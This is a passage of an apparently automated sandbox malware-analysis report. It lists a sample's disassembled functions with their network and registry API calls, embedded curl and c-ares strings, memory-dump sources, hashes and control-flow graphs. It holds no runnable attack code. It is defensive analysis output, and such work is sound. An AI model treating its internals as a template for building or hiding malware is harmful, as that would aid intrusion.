1509->1529 1518 fa7140-fa7144 1510->1518 1515 fa7050 1511->1515 1516 fa7160-fa716d 1511->1516 1512->1502 1519 fa70ae 1512->1519 1513->1499 1521 fa725c-fa7269 1514->1521 1515->1481 1516->1515 1517->1505 1523 fa70fe 1517->1523 1518->1511 1520 fa7146-fa7149 1518->1520 1519->1492 1520->1518 1526 fa714b 1520->1526 1527 fa726b-fa727b __WSAFDIsSet 1521->1527 1528 fa7253-fa7256 1521->1528 1523->1497 1526->1511 1531 fa729a-fa72ac __WSAFDIsSet 1527->1531 1532 fa727d-fa7287 1527->1532 1528->1471 1528->1521 1529->1504 1530->1504 1535 fa72ba-fa72c9 __WSAFDIsSet 1531->1535 1536 fa72ae-fa72b3 1531->1536 1533 fa7289 1532->1533 1534 fa728e-fa7293 1532->1534 1533->1534 1534->1531 1539 fa7295 1534->1539 1537 fa72cf-fa72f6 1535->1537 1538 fa7240 1535->1538 1536->1535 1540 fa72b5 1536->1540 1541 fa72fc-fa7306 1537->1541 1542 fa7245-fa724c 1537->1542 1538->1542 1539->1531 1540->1535 1541->1542 1542->1528
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30a52cdf539bebdf27ec43d1f60d55cffaa2c43d8483ef8bf3be2bfb001589fe
                                                            • Instruction ID: 4b10ba3925e53da3a81d86333c6eec4eabed7a87e2fa782369bfeeb634b4db7e
                                                            • Opcode Fuzzy Hash: 30a52cdf539bebdf27ec43d1f60d55cffaa2c43d8483ef8bf3be2bfb001589fe
                                                            • Instruction Fuzzy Hash: 929104B1A0C3494BD735AA29CC80BBB72D9EFD6374F158B2CE899431D4EB749C40E691
                                                            Function 0105B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1543 105b180-105b195 1544 105b3e0-105b3e7 1543->1544 1545 105b19b-105b1a2 1543->1545 1546 105b1b0-105b1b9 1545->1546 1546->1546 1547 105b1bb-105b1bd 1546->1547 1547->1544 1548 105b1c3-105b1d0 1547->1548 1550 105b1d6-105b1f2 1548->1550 1551 105b3db 1548->1551 1552 105b229-105b22d 1550->1552 1551->1544 1553 105b233-105b246 1552->1553 1554 105b3e8-105b417 1552->1554 1555 105b260-105b264 1553->1555 1556 105b248-105b24b 1553->1556 1562 105b582-105b589 1554->1562 1563 105b41d-105b429 1554->1563 1560 105b269-105b286 call 105af30 1555->1560 1557 105b215-105b223 1556->1557 1558 105b24d-105b256 1556->1558 1557->1552 1561 105b315-105b33c call 1318b00 1557->1561 1558->1560 1570 105b2f0-105b301 1560->1570 1571 105b288-105b2a3 call 105b060 1560->1571 1577 105b342-105b347 1561->1577 1578 105b3bf-105b3ca 1561->1578 1567 105b435-105b44c call 105b590 1563->1567 1568 105b42b-105b433 call 105b590 1563->1568 1582 105b44e-105b456 call 105b590 1567->1582 1583 105b458-105b471 call 105b590 1567->1583 1568->1567 1570->1557 1592 105b307-105b310 1570->1592 1588 105b200-105b213 call 105b020 1571->1588 1589 105b2a9-105b2c7 getsockname call 105b020 1571->1589 1579 105b384-105b38f 1577->1579 1580 105b349-105b358 1577->1580 1584 105b3cc-105b3d9 1578->1584 1579->1578 1587 105b391-105b3a5 1579->1587 1586 105b360-105b382 1580->1586 1582->1583 1601 105b473-105b487 1583->1601 1602 105b48c-105b4a7 1583->1602 1584->1544 1586->1579 1586->1586 1593 105b3b0-105b3bd 1587->1593 1588->1557 1599 105b2cc-105b2dd 1589->1599 1592->1584 1593->1578 1593->1593 1599->1557 1603 105b2e3 1599->1603 1601->1562 1604 105b4b3-105b4cb call 105b660 1602->1604 1605 105b4a9-105b4b1 call 105b660 1602->1605 1603->1592 1610 105b4cd-105b4d5 call 105b660 1604->1610 1611 105b4d9-105b4f5 call 105b660 1604->1611 1605->1604 1610->1611 1616 105b4f7-105b50b 1611->1616 1617 105b50d-105b52b call 105b770 * 2 1611->1617 1616->1562 1617->1562 1622 105b52d-105b531 1617->1622 1623 105b580 1622->1623 1624 105b533-105b53b 1622->1624 1623->1562 1625 105b53d-105b547 1624->1625 1626 105b578-105b57e 1624->1626 1625->1626 1627 105b549-105b54d 1625->1627 1626->1562 1627->1626 1628 105b54f-105b558 1627->1628 1628->1626 1629 105b55a-105b576 call 105b870 * 2 1628->1629 1629->1562 1629->1626
                                                            APIs
                                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 0105B2B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                                            • API String ID: 3358416759-2430778319
                                                            • Opcode ID: 996865d89fa5a8f28a3e2f64e8e71cc466c202e00262e26c1f0532b75c8c324a
                                                            • Instruction ID: 21f56965b6b500d03f44ef6d75b0295d638f73423b5d058c40bb05a46e41ac7d
                                                            • Opcode Fuzzy Hash: 996865d89fa5a8f28a3e2f64e8e71cc466c202e00262e26c1f0532b75c8c324a
                                                            • Instruction Fuzzy Hash: 7FC16D316042059FD798DF28C880A6B7BE2FF88344F04896CED899B3A1DB34ED45CB91
                                                            Function 00F931D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 875670313bd6c475d356f9fe8d3ca756496884b4752a89a2e7392aac01bc2f36
                                                            • Instruction ID: b71b3f77fcbe569e509df9813c3fa6c68eea57902e599d78c16059f3b82b23f9
                                                            • Opcode Fuzzy Hash: 875670313bd6c475d356f9fe8d3ca756496884b4752a89a2e7392aac01bc2f36
                                                            • Instruction Fuzzy Hash: 4031B5B4D083069FDB10EFB8C98469EBBF0BF54304F01896ED898A7254E7349A44DF92
                                                            Function 0104A440 Relevance: 50.1, APIs: 20, Strings: 8, Instructions: 1066registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0104A499
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0104A4FB
                                                            • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0104A531
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0104AA19
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0104AA4C
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0104AA97
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0104AAE9
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0104AB30
                                                            • RegCloseKey.KERNELBASE(?), ref: 0104AB6A
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0104AB82
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0104AC46
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0104AD0A
                                                            • RegEnumKeyExA.KERNELBASE ref: 0104AD8D
                                                            • RegCloseKey.KERNELBASE(?), ref: 0104ADD9
                                                            • RegEnumKeyExA.KERNELBASE ref: 0104AE08
                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0104AE2A
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0104AE54
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0104AF63
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0104AFB2
                                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0104B072
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                            • API String ID: 4281207131-1047472027
                                                            • Opcode ID: 3b65e519001507b173fe5935100818a4d667ee19a38de370e9bf9bbace7a4f7c
                                                            • Instruction ID: 008f21d01f417cd7231376cf71767b298838851c9d1de9f2fbbcb2e42f9a728b
                                                            • Opcode Fuzzy Hash: 3b65e519001507b173fe5935100818a4d667ee19a38de370e9bf9bbace7a4f7c
                                                            • Instruction Fuzzy Hash: 20729FB1644341EFE760DB28CCC1B6B7BE8EF85700F145868F9869B291E771E944CB62
                                                            Function 00FCA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00FCA832
                                                            Strings
                                                            • @, xrefs: 00FCA8F4
                                                            • cf_socket_open() -> %d, fd=%d, xrefs: 00FCA796
                                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 00FCAE1F
                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 00FCADAC
                                                            • Trying [%s]:%d..., xrefs: 00FCA689
                                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00FCAD0A
                                                            • Could not set TCP_NODELAY: %s, xrefs: 00FCA871
                                                            • @, xrefs: 00FCAC42
                                                            • cf-socket.c, xrefs: 00FCA5CD, 00FCA735
                                                            • Local Interface %s is ip %s using address family %i, xrefs: 00FCAE60
                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00FCA6CE
                                                            • Trying %s:%d..., xrefs: 00FCA7C2, 00FCA7DE
                                                            • bind failed with errno %d: %s, xrefs: 00FCB080
                                                            • Local port: %hu, xrefs: 00FCAF28
                                                            • Bind to local port %d failed, trying next, xrefs: 00FCAFE5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001A06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174234685.0000000001A07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174343359.0000000001BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174361386.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174377695.0000000001BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2174395387.0000000001BC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: setsockopt
                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3981526788-2373386790
                                                            • Opcode ID: 6c9d086fcc98876183dca4e7fef59c492c2e82dfe38a789ce95df552fceb1398
                                                            • Instruction ID: 15d65888f861584b446fb18721e2549932119c8b2a9af31002b8d5b64e6f902b
                                                            • Opcode Fuzzy Hash: 6c9d086fcc98876183dca4e7fef59c492c2e82dfe38a789ce95df552fceb1398
                                                            • Instruction Fuzzy Hash: 70621371908346ABE721CF24CD46FABB3E4BF80318F04491DF98997292E775A844DB93
                                                            Function 01059740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 503 1059740-105975b 504 1059780-1059782 503->504 505 105975d-1059768 call 10578a0 503->505 507 1059914-105994e call 1318b70 RegOpenKeyExA 504->507 508 1059788-10597a0 call 1318e00 call 10578a0 504->508 514 105976e-1059770 505->514 515 10599bb-10599c0 505->515 517 1059950-1059955 507->517 518 105995a-1059992 RegQueryValueExA RegCloseKey call 1318b98 507->518 508->515 519 10597a6-10597c5 508->519 514->519 520 1059772-105977e 514->520 521 1059a0c-1059a15 515->521 517->521 533 1059997-10599b5 call 10578a0 518->533 526 1059827-1059833 519->526 527 10597c7-10597e0 519->527 520->508 529 1059835-105985c call 104e2b0 * 2 526->529 530 105985f-1059872 call 1055ca0 526->530 531 10597f6-1059809 527->531 532 10597e2-10597f3 call 1318b50 527->532 529->530 544 10599f0 530->544 545 1059878-105987d call 10577b0 530->545 531->526 543 105980b-1059810 531->543 532->531 533->515 533->519 543->526 548 1059812-1059822 543->548 547 10599f5-10599fb call 1055d00 544->547 550 1059882-1059889 545->550 558 10599fe-1059a09 547->558 548->521 550->547 554 105988f-105989b call 1044fe0 550->554 554->544 561 10598a1-10598c3 call 1318b50 call 10578a0 554->561 558->521 567 10599c2-10599ed call 104e2b0 * 2 561->567 568 10598c9-10598db call 104e2d0 561->568 567->544 568->567 573 10598e1-10598f0 call 104e2d0 568->573 573->567 579 10598f6-1059905 call 10563f0 573->579 583 1059f66-1059f7f call 1055d00 579->583 584 105990b-105990f 579->584 583->558 585 1059a3f-1059a5a call 1056740 call 10563f0 584->585 585->583 592 1059a60-1059a6e call 1056d60 585->592 595 1059a70-1059a94 call 1056200 call 10567e0 call 1056320 592->595 596 1059a1f-1059a39 call 1056840 call 10563f0 592->596 607 1059a16-1059a19 595->607 608 1059a96-1059ac6 call 104d120 595->608 596->583 596->585 607->596 609 1059fc1 607->609 614 1059ae1-1059af7 call 104d190 608->614 615 1059ac8-1059adb call 104d120 608->615 611 1059fc5-1059ffd call 1055d00 call 104e2b0 * 2 609->611 611->558 614->596 622 1059afd-1059b09 call 1044fe0 614->622 615->596 615->614 622->609 627 1059b0f-1059b29 call 104e730 622->627 632 1059f84-1059f88 627->632 633 1059b2f-1059b3a call 10578a0 627->633 635 1059f95-1059f99 632->635 633->632 640 1059b40-1059b54 call 104e760 633->640 637 1059fa0-1059fb6 call 104ebf0 * 2 635->637 638 1059f9b-1059f9e 635->638 650 1059fb7-1059fbe 637->650 638->609 638->637 646 1059f8a-1059f92 640->646 647 1059b5a-1059b6e call 104e730 640->647 646->635 653 1059b70-105a004 647->653 654 1059b8c-1059b97 call 10563f0 647->654 650->609 659 105a015-105a01d 653->659 662 1059b9d-1059bbf call 1056740 call 10563f0 654->662 663 1059c9a-1059cab call 104ea00 654->663 660 105a024-105a045 call 104ebf0 * 2 659->660 661 105a01f-105a022 659->661 660->611 661->611 661->660 662->663 680 1059bc5-1059bda call 1056d60 662->680 672 1059f31-1059f35 663->672 673 1059cb1-1059ccd call 104ea00 call 104e960 663->673 675 1059f37-1059f3a 672->675 676 1059f40-1059f61 call 104ebf0 * 2 672->676 689 1059cfd-1059d0e call 104e960 673->689 690 1059ccf 673->690 675->596 675->676 676->596 680->663 692 1059be0-1059bf4 call 1056200 call 10567e0 680->692 701 1059d10 689->701 702 1059d53-1059d55 689->702 693 1059cd1-1059cec call 104e9f0 call 104e4a0 690->693 692->663 709 1059bfa-1059c0b call 1056320 692->709 714 1059d47-1059d51 693->714 715 1059cee-1059cfb call 104e9d0 693->715 707 1059d12-1059d2d call 104e9f0 call 104e4a0 701->707 706 1059e69-1059e8e call 104ea40 call 104e440 702->706 731 1059e94-1059eaa call 104e3c0 706->731 732 1059e90-1059e92 706->732 728 1059d2f-1059d3c call 104e9d0 707->728 729 1059d5a-1059d6f call 104e960 707->729 723 1059b75-1059b86 call 104ea00 709->723 724 1059c11-1059c1c call 1057b70 709->724 719 1059dca-1059ddb call 104e960 714->719 715->689 715->693 737 1059ddd-1059ddf 719->737 738 1059e2e-1059e36 719->738 723->654 746 1059f2d 723->746 724->654 750 1059c22-1059c33 call 104e960 724->750 728->707 757 1059d3e-1059d42 728->757 760 1059d71-1059d73 729->760 761 1059dc2 729->761 754 1059eb0-1059eb1 731->754 755 105a04a-105a04c 731->755 742 1059eb3-1059ec4 call 104e9c0 732->742 747 1059e06-1059e21 call 104e9f0 call 104e4a0 737->747 743 1059e3d-1059e5b call 104ebf0 * 2 738->743 744 1059e38-1059e3b 738->744 742->596 763 1059eca-1059ed0 742->763 752 1059e5e-1059e67 743->752 744->743 744->752 746->672 786 1059de1-1059dee call 104ec80 747->786 787 1059e23-1059e2c call 104eac0 747->787 773 1059c35 750->773 774 1059c66-1059c75 call 10578a0 750->774 752->706 752->742 754->742 766 105a057-105a070 call 104ebf0 * 2 755->766 767 105a04e-105a051 755->767 757->706 768 1059d9a-1059db5 call 104e9f0 call 104e4a0 760->768 761->719 771 1059ee5-1059ef2 call 104e9f0 763->771 766->650 767->609 767->766 801 1059d75-1059d82 call 104ec80 768->801 802 1059db7-1059dc0 call 104eac0 768->802 771->596 795 1059ef8-1059f0e call 104e440 771->795 781 1059c37-1059c51 call 104e9f0 773->781 791 105a011 774->791 792 1059c7b-1059c8f call 104e7c0 774->792 781->654 814 1059c57-1059c64 call 104e9d0 781->814 805 1059df1-1059e04 call 104e960 786->805 787->805 791->659 792->654 816 1059c95-105a00e 792->816 812 1059f10-1059f26 call 104e3c0 795->812 813 1059ed2-1059edf call 104e9e0 795->813 818 1059d85-1059d98 call 104e960 801->818 802->818 805->738 805->747 812->813 829 1059f28 812->829 813->596 813->771 814->774 814->781 816->791 818->761 818->768 829->609
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 01059946
                                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 01059974
                                                            • RegCloseKey.KERNELBASE(?), ref: 0105998B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            • Associated: 00000000.00000002.2173407944.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001501000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001667000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173424419.0000000001669000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173920956.000000000166C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000166E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000017FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.000000000190C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.0000000001912000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2173957154.00000000019F6000.00000040.00000001.01000000.00000003.sdmpDownload File
